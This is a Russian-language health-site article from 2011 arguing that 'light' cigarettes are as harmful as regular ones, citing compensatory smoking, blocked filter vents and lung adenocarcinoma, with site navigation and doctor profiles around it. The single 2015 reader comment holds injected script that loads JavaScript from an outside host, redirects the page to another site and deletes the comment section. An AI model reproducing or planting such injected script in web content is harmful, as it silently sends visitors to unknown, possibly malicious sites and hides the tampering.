Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Тяжелые последствия «легк...  >>  Тяжелые последствия «легких» сигарет
 
Обратная связь
 

Тяжелые последствия «легких» сигарет

Размер шрифта
09 июня 2011 00:00
  • google_analytics: false
  • Нравится

Разделение сигарет на «тяжелые» и «легкие» – ловкий маркетинговый трюк. Угроза для организма от последствий курения не снижается, а наоборот – возрастает: чтобы достичь эффекта от одной обычной сигареты, люди зачастую выкуривают две «легких» подряд.

Тяжелые последствия «легких» сигарет

Егор Кошелев / «Здоровье-инфо»

Появление «легких» сигарет относится к началу 60-х годов XX века. Тогда же и зародился миф о том, что при переходе на «легкие» сигареты удастся значительно снизить вред, который наносит организму человека табакокурение. Например, еще в 1981 году бывший главный военный врач США Джулиус Ричмонд настоятельно советовал тем, кто не может или не хочет бросить курить, перейти на табачную продукцию класса light. К счастью, эта концепция была сразу же отвергнута, но «легкие» до сих пор успешно продаются во всем мире. В надежде снизить риск страшных заболеваний, которые влечет за собой пристрастие к табаку, многие люди переходят с нормальных сигарет на облегченные. При этом они даже и не подозревают, что те представляют для здоровья не меньшую угрозу:

1. Стимул больше курить

Курение табачной продукции с пониженным содержанием никотина и смол может немного снизить риск развития рака легких и немного продлить жизнь курильщика. Но лишь при том условии, что не возникает компенсаторного увеличения числа выкуриваемых сигарет! При переходе на «легкие» курильщики, как правило, незаметно для самих себя увеличивают число сигарет в день. Отсутствие привычного вкуса побуждает их затягиваться глубже. Все это сводит на нет мнимые преимущества изделий с низкой концентрацией вредных веществ и увеличивает риск для здоровья. «Легкие» сигареты провоцируют рак, сердечно-сосудистые и другие угрожающие жизни заболевания – как остальная табачная продукция.

2. Бесполезные фильтры

«Легкие» сигареты не менее опасны, чем обычные. В ходе испытаний для того, чтобы измерить уровень вредных веществ в табачном дыме, сигареты выкуриваются специальной машиной, имитирующей затяжку курильщика. В случае с «легкими» сигаретами аппаратура покажет низкое содержание никотина и смол. Но с реальностью эти данные не имеют ничего общего! Дело в том, что в процессе курения люди неосознанно перекрывают губами или пальцами микроскопические вентиляционные отверстия в фильтре. По мнению производителей сигарет, эти отверстия снижают поступление смол, никотина и оксида углерода, но большинство людей даже не знают об их существовании. Согласитесь, налицо мошенничество в плане преимуществ «легких» сигарет для здоровья.

3. Риск аденокарциномы

Курение легких сигарет с фильтром может быть причиной аденокарциномы – особого вида рака легких. Чтобы получить необходимую дозу отравляющих веществ, курильщик вынужден не только сильнее затягиваться, но и дольше задерживать дым в легких – в организм попадает гораздо больше смол и никотина. Аденокарцинома является одним из самых сложных и опасных видов рака легких, так как дает метастазы в различные области легочной ткани, что фатально сказывается на функции легких. Пациенты, страдающие от аденокарциномы легких, испытывают следующие симптомы: боль в груди, удушье, одышка и постоянный кашель. Исследования показали, что риск развития рака легких одинаков – и для тех, кто курит обычные «крепкие» сигареты, и для тех, кто предпочитает «легкие».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Топ-10 мифов о курении   Курение бьет по костям   Как отучить мужчину от курения?   В плену пассивного курения  
31 мая 2011Сегодня - Всемирный день отказа от курения 06 мая 2011Сигареты в Австралии станут «пугающими»
 
12 августа 2011Курящие женщины чаще умирают от инфарктов, чем мужчины 05 июля 2011Никотин только по рецепту
 

Слайдшоу

1
Какие привычки портят вам жизнь?
Как сохранить мозги в 30 лет
Что происходит в теле курящего

Тесты

1
Есть ли у вас остеопороз?
Как контролировать бронхиальную астму
Какая у вас стадия остеохондроза?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.